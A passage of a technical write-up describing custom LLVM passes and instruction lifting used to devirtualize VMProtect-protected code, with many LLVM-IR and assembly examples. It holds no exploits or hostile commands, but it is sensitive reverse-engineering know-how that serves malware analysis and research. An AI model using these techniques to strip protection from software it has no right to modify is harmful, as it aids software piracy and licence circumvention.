LLVM doesn’t automatically see through the conditional load, but it is providing us with all the needed information to write such an optimization ourselves. In fact, the ValueTracking analysis exposes the computeKnownBits function that we can use to determine if the index used in a getelementptr instruction is bound to have just two values.

At this point we can generate two separated load instructions accessing the stack slots with the inferred indices and feed them to a select instruction controlled by the index itself. At the next store-to-load propagation, LLVM will happily identify the matching store and load instructions, propagating the constants representing the conditional branch destinations and generating a nice select instruction with second and third constant operands.

; Matched pattern
%i0 = add i64 %base, %index
%i1 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %i0
%i2 = bitcast i8* %i1 to i64*
%i3 = load i64, i64* %i2, align 1

; Exploded form
%51 = add i64 %base, 0
%52 = add i64 %base, 8
%53 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
%54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
%55 = bitcast i8* %53 to i64*
%56 = bitcast i8* %54 to i64*
%57 = load i64, i64* %55, align 8
%58 = load i64, i64* %56, align 8
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 %57, i64 %58

; Simplified select instruction
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 5369966919, i64 5369966790

The snippet above shows the matched pattern, its exploded form suitable for the LLVM propagation and its final optimized shape. In this case the ValueTracking analysis provided the values 0 and 8 as the only feasible ones for the %index value.

A brief discussion about this pass can be found in this chain of messages in the LLVM mailing list.

SynthesizeFlags

This pass falls in between the categories of the VMProtect specific optimization problems and LLVM optimization limitations. In fact, this pass is based on the enumerative synthesis logic implemented by Souper, with some minor tweaks to make it more performant for our use-case.

This pass exists because I’m lazy and the fewer ad-hoc patterns I write, the happier I am. The patterns we are talking about are the ones generated by the flag manipulations that VMProtect does when computing the condition for a conditional branch. LLVM already does a good job with simplifying part of the patterns, but to obtain mint-like results we absolutely need to help it a bit.

There’s not much to say about this pass, it is basically invoking Souper’s enumerative synthesis with a selected set of components (Inst::CtPop, Inst::Eq, Inst::Ne, Inst::Ult, Inst::Slt, Inst::Ule, Inst::Sle, Inst::SAddO, Inst::UAddO, Inst::SSubO, Inst::USubO, Inst::SMulO, Inst::UMulO), requiring the synthesis of a single instruction, enabling the data-flow pruning option and bounding the LHS candidates to a maximum of 50. Additionally the pass is executing the synthesis only on the i1 conditions used by the select and br instructions.

This Godbolt page shows the devirtualized LLVM-IR output obtained appending the SynthesizeFlags pass to the pipeline and the resulting assembly with the properly recompiled conditional jumps. The original assembly code can be seen below. It’s a dummy sequence of instructions where the key piece is the comparison between the rax and rbx registers that drives the conditional branch jcc.

start:
  cmp rax, rbx
  jcc label
  and rcx, rdx
  mov qword ptr ds:[rcx], 1
  jmp exit
label:
  xor rcx, rdx
  add qword ptr ds:[rcx], 2
exit:

MemoryCoalescing

This pass falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Passes like DSE already attempt to handle the case where a store instruction is partially or completely overlapping with other store instructions. Although the more convoluted case of multiple stores contributing to the value of a single memory slot are somehow only partially handled.

This pass is focusing on the handling of the case illustrated in the following snippet, where multiple smaller stores contribute to the creation of a bigger value subsequently accessed by a single load instruction.

define dso_local i64 @WhatDidYouDoToMySonYouEvilMonster(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = add i64 %1, -8
  %3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
  %4 = add i64 %1, -16
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = load i64, i64* %rax, align 8
  %7 = add i64 %1, -10
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 %6, i64* %9, align 1
  %10 = bitcast i8* %8 to i32*
  %11 = trunc i64 %6 to i32
  %12 = add i64 %1, -6
  %13 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %12
  %14 = bitcast i8* %13 to i32*
  store i32 %11, i32* %14, align 1
  %15 = bitcast i8* %13 to i16*
  %16 = trunc i64 %6 to i16
  %17 = add i64 %1, -4
  %18 = add i64 %1, -12
  %19 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %18
  %20 = bitcast i8* %19 to i64*
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %17
  %22 = bitcast i8* %21 to i16*
  %23 = load i16, i16* %22, align 1
  store i16 %23, i16* %15, align 1
  %24 = load i32, i32* %14, align 1
  %25 = shl i32 %24, 8
  %26 = bitcast i8* %21 to i32*
  store i32 %25, i32* %26, align 1
  %27 = bitcast i8* %3 to i16*
  store i16 %16, i16* %27, align 1
  %28 = bitcast i8* %8 to i16*
  store i16 %16, i16* %28, align 1
  %29 = load i32, i32* %10, align 1
  %30 = shl i32 %29, 8
  %31 = bitcast i8* %3 to i32*
  store i32 %30, i32* %31, align 1
  %32 = add i64 %1, -14
  %33 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %32
  %34 = add i64 %1, -2
  %35 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %34
  %36 = bitcast i8* %35 to i16*
  %37 = load i16, i16* %36, align 1
  store i16 %37, i16* %27, align 1
  %38 = add i64 %1, -18
  %39 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %38
  %40 = bitcast i8* %39 to i64*
  store i64 %6, i64* %40, align 1
  %41 = bitcast i8* %39 to i32*
  %42 = bitcast i8* %33 to i16*
  %43 = load i16, i16* %42, align 1
  %44 = bitcast i8* %19 to i16*
  %45 = load i16, i16* %44, align 1
  store i16 %45, i16* %42, align 1
  %46 = bitcast i8* %33 to i32*
  %47 = load i32, i32* %46, align 1
  %48 = shl i32 %47, 8
  %49 = bitcast i8* %19 to i32*
  store i32 %48, i32* %49, align 1
  %50 = bitcast i8* %5 to i16*
  store i16 %43, i16* %50, align 1
  %51 = bitcast i8* %39 to i16*
  store i16 %43, i16* %51, align 1
  %52 = load i32, i32* %41, align 1
  %53 = shl i32 %52, 8
  %54 = bitcast i8* %5 to i32*
  store i32 %53, i32* %54, align 1
  %55 = load i16, i16* %28, align 1
  store i16 %55, i16* %50, align 1
  %56 = load i32, i32* %54, align 1
  store i32 %56, i32* %49, align 1
  %57 = load i64, i64* %20, align 1
  store i64 %57, i64* %rax, align 8
  ret i64 5368713262
}

Now, you can arm yourself with patience and manually match all the store and load operations, or you can trust me when I tell you that all of them are concurring to the creation of a single i64 value that will be finally saved in the rax register.

The pass is working at the intra-block level and it’s relying on the analysis results provided by the MemorySSA, ScalarEvolution and AAResults interfaces to backward walk the definition chains concurring to the creation of the value fetched by each load instruction in the block. Doing that, it is filling a structure which keeps track of the aliasing store instructions, the stored values, and the offsets and sizes overlapping with the memory slot fetched by each load. If a sequence of store assignments completely defining the value of the whole memory slot is found, the chain is processed to remove the store-to-load indirection. Subsequent passes may then rely on this new indirection-free chain to apply more transformations. As an example the previous LLVM-IR snippet turns in the following optimized LLVM-IR snippet when the MemoryCoalescing pass is applied before executing the InstCombine pass. Nice huh?

define dso_local i64 @ThanksToLLVMMySonBswap64IsBack(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rax, align 8
  %2 = call i64 @llvm.bswap.i64(i64 %1)
  store i64 %2, i64* %rax, align 8
  ret i64 5368713262
}

PartialOverlapDSE

This pass also falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Conceptually similar to the MemoryCoalescing pass, the goal of this pass is to sweep a function to identify chains of store instructions that post-dominate a single store instruction and kill its value before it is actually being fetched. Passes like DSE are doing a similar job, although limited to some forms of full overlapping caused by multiple stores on a single post-dominated store.

Applying the -O3 pipeline to the following example won’t remove the first 64 bits dead store at RAM[%0], even if the subsequent 64 bits stores at RAM[%0 - 4] and RAM[%0 + 4] fully overlap it, redefining its value.

define dso_local void @DSE(i64 %0) local_unnamed_addr #0 {
  %2 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %0
  %3 = bitcast i8* %2 to i64*
  store i64 1234605616436508552, i64* %3, align 1
  %4 = add i64 %0, -4
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = bitcast i8* %5 to i64*
  store i64 -6148858396813837381, i64* %6, align 1
  %7 = add i64 %0, 4
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 -3689348814455574802, i64* %9, align 1
  ret void
}

Adding the PartialOverlapDSE pass to the pipeline will identify and kill the first store, enabling other passes to eventually kill the chain of computations contributing to the stored value. The built-in DSE pass is most likely not executing such a kill because collecting information about multiple overlapping stores is an expensive operation.

PointersHoisting

This pass is strictly related to the IsGuaranteedLoopInvariant patch I submitted, in fact it is just identifying all the pointers that could be safely hoisted to the entry block because depending solely on values coming directly from the entry block. Applying this kind of transformation prior to the execution of the DSE pass may lead to better optimization results.

As an example, consider this devirtualized function containing a rather useless switch case. I’m saying rather useless because each store in the case blocks is post-dominated and killed by the store i32 22, i32* %85 instruction, but LLVM is not going to kill those stores until we move the pointer computation to the entry block.

define dso_local i64 @F_0x1400045b0(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = load i64, i64* %rcx, align 8
  %3 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %4 = extractvalue { i32, i32, i32, i32 } %3, 0
  %5 = extractvalue { i32, i32, i32, i32 } %3, 1
  %6 = and i32 %4, 4080
  %7 = icmp eq i32 %6, 4064
  %8 = xor i32 %4, 32
  %9 = select i1 %7, i32 %8, i32 %4
  %10 = and i32 %5, 16777215
  %11 = add i32 %9, %10
  %12 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %13 = add i64 %12, 288
  %14 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %13
  %15 = bitcast i8* %14 to i16*
  %16 = load i16, i16* %15, align 1
  %17 = zext i16 %16 to i32
  %18 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %19 = shl nuw nsw i32 %17, 7
  %20 = add i64 %18, 32
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %20
  %22 = bitcast i8* %21 to i32*
  %23 = load i32, i32* %22, align 1
  %24 = xor i32 %23, 2480
  %25 = add i32 %11, %19
  %26 = trunc i64 %18 to i32
  %27 = add i64 %18, 88
  %28 = xor i32 %25, %26
  br label %29

29:                                               ; preds = %37, %0
  %30 = phi i64 [ %27, %0 ], [ %38, %37 ]
  %31 = phi i32 [ %24, %0 ], [ %39, %37 ]
  %32 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %30
  %33 = bitcast i8* %32 to i32*
  %34 = load i32, i32* %33, align 1
  %35 = xor i32 %34, 30826
  %36 = icmp eq i32 %28, %35
  br i1 %36, label %41, label %37

37:                                               ; preds = %29
  %38 = add i64 %30, 8
  %39 = add i32 %31, -1
  %40 = icmp eq i32 %31, 1
  br i1 %40, label %86, label %29

41:                                               ; preds = %29
  %42 = add i64 %1, 40
  %43 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %42
  %44 = bitcast i8* %43 to i32*
  %45 = load i32, i32* %44, align 1
  %46 = add i64 %1, 36
  %47 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %46
  %48 = bitcast i8* %47 to i32*
  store i32 %45, i32* %48, align 1
  %49 = icmp ugt i32 %45, 5
  %50 = zext i32 %45 to i64
  %51 = add i64 %1, 32
  br i1 %49, label %81, label %52

52:                                               ; preds = %41
  %53 = shl nuw nsw i64 %50, 1
  %54 = and i64 %53, 4294967296
  %55 = sub nsw i64 %50, %54
  %56 = shl nsw i64 %55, 2
  %57 = add nsw i64 %56, 5368964976
  %58 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %57
  %59 = bitcast i8* %58 to i32*
  %60 = load i32, i32* %59, align 1
  %61 = zext i32 %60 to i64
  %62 = add nuw nsw i64 %61, 5368709120
  switch i32 %60, label %66 [
    i32 1465288, label %63
    i32 1510355, label %78
    i32 1706770, label %75
    i32 2442748, label %72
    i32 2740242, label %69
  ]

63:                                               ; preds = %52
  %64 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %65 = bitcast i8* %64 to i32*
  store i32 9, i32* %65, align 1
  br label %66

66:                                               ; preds = %52, %63
  %67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %68 = bitcast i8* %67 to i32*
  store i32 20, i32* %68, align 1
  br label %69

69:                                               ; preds = %52, %66
  %70 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %71 = bitcast i8* %70 to i32*
  store i32 30, i32* %71, align 1
  br label %72

72:                                               ; preds = %52, %69
  %73 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %74 = bitcast i8* %73 to i32*
  store i32 55, i32* %74, align 1
  br label %75

75:                                               ; preds = %52, %72
  %76 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %77 = bitcast i8* %76 to i32*
  store i32 99, i32* %77, align 1
  br label %78

78:                                               ; preds = %52, %75
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %80 = bitcast i8* %79 to i32*
  store i32 100, i32* %80, align 1
  br label %81

81:                                               ; preds = %41, %78
  %82 = phi i64 [ %62, %78 ], [ %50, %41 ]
  %83 = phi i64 [ 5368709120, %78 ], [ %2, %41 ]
  %84 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %85 = bitcast i8* %84 to i32*
  store i32 22, i32* %85, align 1
  store i64 %83, i64* %rcx, align 8
  br label %86

86:                                               ; preds = %37, %81
  %87 = phi i64 [ %82, %81 ], [ 3735929054, %37 ]
  %88 = phi i64 [ 5368727067, %81 ], [ 0, %37 ]
  store i64 %87, i64* %rax, align 8
  ret i64 %88
}

When the PointersHoisting pass is applied before executing the DSE pass we obtain the following code, where the switch case has been completely removed because it has been deemed dead.

define dso_local i64 @F_0x1400045b0(i64* noalias nocapture nonnull align 8 dereferenceable(8) %0, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %1, i64* noalias nocapture nonnull align 8 dereferenceable(8) %2, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %3, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %4, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %5, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %6, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %7, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %16, i64 %17, i64 %18, i64 %19) local_unnamed_addr {
  %21 = load i64, i64* %7, align 8
  %22 = load i64, i64* %2, align 8
  %23 = tail call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %24 = extractvalue { i32, i32, i32, i32 } %23, 0
  %25 = extractvalue { i32, i32, i32, i32 } %23, 1
  %26 = and i32 %24, 4080
  %27 = icmp eq i32 %26, 4064
  %28 = xor i32 %24, 32
  %29 = select i1 %27, i32 %28, i32 %24
  %30 = and i32 %25, 16777215
  %31 = add i32 %29, %30
  %32 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %33 = add i64 %32, 288
  %34 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %33
  %35 = bitcast i8* %34 to i16*
  %36 = load i16, i16* %35, align 1
  %37 = zext i16 %36 to i32
  %38 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %39 = shl nuw nsw i32 %37, 7
  %40 = add i64 %38, 32
  %41 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %40
  %42 = bitcast i8* %41 to i32*
  %43 = load i32, i32* %42, align 1
  %44 = xor i32 %43, 2480
  %45 = add i32 %31, %39
  %46 = trunc i64 %38 to i32
  %47 = add i64 %38, 88
  %48 = xor i32 %45, %46
  %49 = add i64 %21, 32
  %50 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %49
  br label %51

  %52 = phi i64 [ %47, %20 ], [ %60, %59 ]
  %53 = phi i32 [ %44, %20 ], [ %61, %59 ]
  %54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
  %55 = bitcast i8* %54 to i32*
  %56 = load i32, i32* %55, align 1
  %57 = xor i32 %56, 30826
  %58 = icmp eq i32 %48, %57
  br i1 %58, label %63, label %59

  %60 = add i64 %52, 8
  %61 = add i32 %53, -1
  %62 = icmp eq i32 %53, 1
  br i1 %62, label %88, label %51

  %64 = add i64 %21, 40
  %65 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %64
  %66 = bitcast i8* %65 to i32*
  %67 = load i32, i32* %66, align 1
  %68 = add i64 %21, 36
  %69 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %68
  %70 = bitcast i8* %69 to i32*
  store i32 %67, i32* %70, align 1
  %71 = icmp ugt i32 %67, 5
  %72 = zext i32 %67 to i64
  br i1 %71, label %84, label %73

  %74 = shl nuw nsw i64 %72, 1
  %75 = and i64 %74, 4294967296
  %76 = sub nsw i64 %72, %75
  %77 = shl nsw i64 %76, 2
  %78 = add nsw i64 %77, 5368964976
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %78
  %80 = bitcast i8* %79 to i32*
  %81 = load i32, i32* %80, align 1
  %82 = zext i32 %81 to i64
  %83 = add nuw nsw i64 %82, 5368709120
  br label %84

  %85 = phi i64 [ %83, %73 ], [ %72, %63 ]
  %86 = phi i64 [ 5368709120, %73 ], [ %22, %63 ]
  %87 = bitcast i8* %50 to i32*
  store i32 22, i32* %87, align 1
  store i64 %86, i64* %2, align 8
  br label %88

  %89 = phi i64 [ %85, %84 ], [ 3735929054, %59 ]
  %90 = phi i64 [ 5368727067, %84 ], [ 0, %59 ]
  store i64 %89, i64* %0, align 8
  ret i64 %90
}

ConstantConcretization

This pass falls under the category of the generic LLVM optimization passes that are useful when dealing with obfuscated code, but basically useless, at least in the current shape, in a standard compilation pipeline. In fact, it’s not uncommon to find obfuscated code relying on constants stored in data sections added during the protection phase.

As an example, on some versions of VMProtect, when the Ultra mode is used, the conditional branch computations involve dummy constants fetched from a data section. Or if we think about a virtualized jump table (e.g. generated by a switch in the original binary), we also have to deal with a set of constants fetched from a data section.

Hence the reason for having a custom pass that, during the execution of the pipeline, identifies potential constant data accesses and converts the associated memory load into an LLVM constant (or chain of constants). This process can be referred to as constant(s) concretization.

The pass is going to identify all the load memory accesses in the function and determine if they fall in the following categories:

  • A constantexpr memory load that is using an address contained in one of the binary sections; this case is what you would hit when dealing with some kind of data-based obfuscation;
  • A symbolic memory load that is using as base an address contained in one of the binary sections and as index an expression that is constrained to a limited amount of values; this case is what you would hit when dealing with a jump table.

In both cases the user needs to provide a safe set of memory ranges that the pass can consider as read-only, otherwise the pass will restrict the concretization to addresses falling in read-only sections in the binary.

In the first case, the address is directly available and the associated value can be resolved simply parsing the binary.

In the second case the expression computing the symbolic memory access is sliced, the constraint(s) coming from the predecessor block(s) are harvested and Souper is queried in an incremental way (conceptually similar to the one used while solving the outgoing edges in a VmBlock) to obtain the set of addresses accessing the binary. Each address is then verified to be really laying in a binary section and the corresponding value is fetched. At this point we have a unique mapping between each address and its value, that we can turn into a selection cascade, illustrated in the following LLVM-IR snippet:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 2442748, i64 1465288
%96 = select i1 %91, i64 650651, i64 %95
%97 = select i1 %92, i64 2740242, i64 %96
%98 = select i1 %93, i64 1706770, i64 %97
%99 = select i1 %94, i64 1510355, i64 %98

The %99 value will hold the proper constant based on the address computed by the %89 value. The example above represents the lifted jump table shown in the next snippet, where you can notice the jump table base 0x14003E770 (5368964976) and the corresponding addresses and values:

.rdata:0x14003E770 dd 0x165BC8
.rdata:0x14003E774 dd 0x9ED9B
.rdata:0x14003E778 dd 0x29D012
.rdata:0x14003E77C dd 0x2545FC
.rdata:0x14003E780 dd 0x1A0B12
.rdata:0x14003E784 dd 0x170BD3

If we have a peek at the sliced jump condition implementing the virtualized switch case (below), this is how it looks after the ConstantConcretization pass has been scheduled in the pipeline and further InstCombine executions updated the selection cascade to compute the switch case addresses. Souper will therefore be able to identify the 6 possible outgoing edges, leading to the devirtualized switch case presented in the PointersHoisting section:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 5371151872, i64 5370415894
%96 = select i1 %91, i64 5369359775, i64 %95
%97 = select i1 %92, i64 5371449366, i64 %96
%98 = select i1 %93, i64 5370174412, i64 %97
%99 = select i1 %94, i64 5370219479, i64 %98
%100 = call i64 @HelperKeepPC(i64 %99) #15

Unsupported instructions

It is well known that all the virtualization-based protectors support only a subset of the targeted ISA. Thus, when an unsupported instruction is found, an exit from the virtual machine is executed (context switching to the host code), running the unsupported instruction(s) and re-entering the virtual machine (context switching back to the virtualized code).

The UnsupportedInstructionsLiftingToLLVM proof-of-concept is an attempt to lift the unsupported instructions to LLVM-IR, generating an InlineAsm instruction configured with the set of clobbering constraints and (ex|im)plicitly accessed registers. An execution context structure representing the general purpose registers is employed during the lifting to feed the inline assembly call instruction with the loaded registers, and to store the updated registers after the inline assembly execution.

This approach guarantees a smooth connection between two virtualized VmStubs and an intermediate sequence of unsupported instructions, enabling some of the LLVM optimizations and a better registers allocation during the recompilation phase.

An example of the lifted unsupported instruction rdtsc follows:

define void @Unsupported_rdtsc(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = tail call %IAOutTy.0 asm sideeffect inteldialect "rdtsc", "={eax},={edx}"() #1
  %3 = bitcast %ContextTy* %0 to i32*
  %4 = extractvalue %IAOutTy.0 %2, 0
  store i32 %4, i32* %3, align 4
  %5 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %6 = bitcast %RegisterW* %5 to i32*
  %7 = extractvalue %IAOutTy.0 %2, 1
  store i32 %7, i32* %6, align 4
  ret void
}

An example of the lifted unsupported instruction cpuid follows:

define void @Unsupported_cpuid(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = bitcast %ContextTy* %0 to i32*
  %3 = load i32, i32* %2, align 4
  %4 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 2, i32 0
  %5 = bitcast %RegisterW* %4 to i32*
  %6 = load i32, i32* %5, align 4
  %7 = tail call %IAOutTy asm sideeffect inteldialect "cpuid", "={eax},={ecx},={edx},={ebx},{eax},{ecx}"(i32 %3, i32 %6) #1
  %8 = extractvalue %IAOutTy %7, 0
  store i32 %8, i32* %2, align 4
  %9 = extractvalue %IAOutTy %7, 1
  store i32 %9, i32* %5, align 4
  %10 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %11 = bitcast %RegisterW* %10 to i32*
  %12 = extractvalue %IAOutTy %7, 2
  store i32 %12, i32* %11, align 4
  %13 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 1, i32 0
  %14 = bitcast %RegisterW* %13 to i32*
  %15 = extractvalue %IAOutTy %7, 3
  store i32 %15, i32* %14, align 4
  ret void
}

Recompilation

I haven’t really explored the recompilation in depth so far, because my main objective was to obtain readable LLVM-IR code, but some considerations follow:

  • If the goal is being able to execute, and eventually decompile, the recovered code, then compiling the devirtualized function using the layer of indirection offered by the general purpose register pointers is a valid way to do so. It is conceptually similar to the kind of indirection used by Remill with its own State structure. SATURN employs this technique when the stack slots and arguments recovery cannot be applied.
  • If the goal is to achieve a 1:1 register allocation, then things get more complicated because one can’t simply map all the general purpose register pointers to the hardware registers hoping for no side-effect to manifest.

